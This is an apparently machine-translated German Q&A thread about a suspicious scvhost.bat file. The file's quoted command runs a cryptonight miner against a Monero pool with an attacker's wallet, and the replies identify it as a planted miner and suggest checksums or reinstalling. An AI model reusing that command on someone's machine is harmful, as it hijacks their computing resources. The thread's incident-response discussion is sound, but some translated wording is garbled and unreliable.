Ist das scvhost.bat mit cryptonight ein Virus oder Miner?

4046
NewbieProgrammer

Ich habe gerade diese .bat-Datei mit dem Namen scvhost.bat gefunden. Die Datei hatte folgenden Inhalt:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Ist dies ein Virus (zum Stehlen von Informationen usw.) oder ein gepflanzter Bergmann? Ich mache mir Sorgen, da ich mich auch mit Kryptowährungen beschäftige und stratumeine Währung ist, die in der obigen Datei erwähnt wird.

17
Dies scheint tatsächlich ein Bergmann zu sein. Da Sie selbst Krypto-Währungen verwenden, sollten Sie, wenn Sie auch meine verwenden, sicherstellen, dass dies nicht Teil dessen ist, was Sie für meine Mine verwenden. Sie können dies tun, indem Sie die Erweiterung .bat in einen anderen Namen umbenennen und nachsehen, ob Sie nach einem Neustart normalerweise noch minen können. Eine Sache, die ich an dieser Datei seltsam finde, ist, dass sie sich normalerweise selbst nennt, da scvhost sowohl der Name der ausgeführten Datei als auch die bat-Datei ist. Normalerweise würde das zu einer Schleife führen. LPChip vor 6 Jahren 1
@LPChip scvhost ist ein Windows-Systemprozess. Die bat-Datei ruft scvhost auf, um cryptonight.exe als Hintergrunddienst zu starten. Virtual Anomaly vor 6 Jahren 0
@VirtualAnomaly Ich denke, dass Sie sVChost mit sCVhost hier falsch verstehen. Ja, ich bin mir sehr bewusst, dass svchost die Mechanik für das Hosting von Diensten ist. LPChip vor 6 Jahren 2
Vielen Dank für Ihre Antwort! Ich gehöre nicht zu mir, sondern besitze ein paar Münzen. Ich fand heraus, dass es sich tatsächlich um einen Monero-Minenarbeiter in meinem System handelt. Kein Wunder, dass mein PC so langsam wurde. Ich habe jetzt die Adresse für die Brieftasche und sage, dass der Besitzer 8+ Monero-Münzen abgebaut hat, das sind ungefähr 3k: / NewbieProgrammer vor 6 Jahren 0
@LPChip Ich entschuldige mich, du hast recht, ich habe mich geirrt. Virtual Anomaly vor 6 Jahren 2
Jemand hat zu viel Starcraft gespielt, denke ich. CodesInChaos vor 6 Jahren 2
@CodesInChaos Gibt es ein bekanntes Problem mit Starcraft oder warum? (Ich verstehe es offensichtlich nicht) lucidbrot vor 6 Jahren 0
@lucidbrot SCVs sind die "Builder" -Einheiten eines der Rennen (Terrans) des Spiels. In diesem Fall steht es für "Space Construction Vehicle". Aaron vor 6 Jahren 1

1 Antwort auf die Frage

34
mtak

Dies scheint ein Miner zu sein, zumal der Parameter die URL zu einem Mining-Pool enthält. Sie müssen jedoch sicher sein, was in der Binärdatei enthalten ist. Es wäre sinnvoll, die Prüfsummen der gefundenen Binärdateien Ihres Systems mit den vom Entwicklungsteam des Miners erstellten Releases zu vergleichen. Wenn sie sich unterscheiden; Betrachten Sie Ihr System als unsicher.

Ein anderes Problem ist, dass Sie etwas über diesen Miner herausgefunden haben (wahrscheinlich weil er viel CPU verbraucht hat), aber Sie haben keine Ahnung, was sonst auf Ihrem System passiert ist. Wenn ein Eindringling den Bergmann starten könnte, hätte er auch andere Dinge starten können. Es ist möglicherweise eine gute Idee, die Daten von einer Sicherung wiederherzustellen oder eine Neuinstallation durchzuführen.

Verwandte Probleme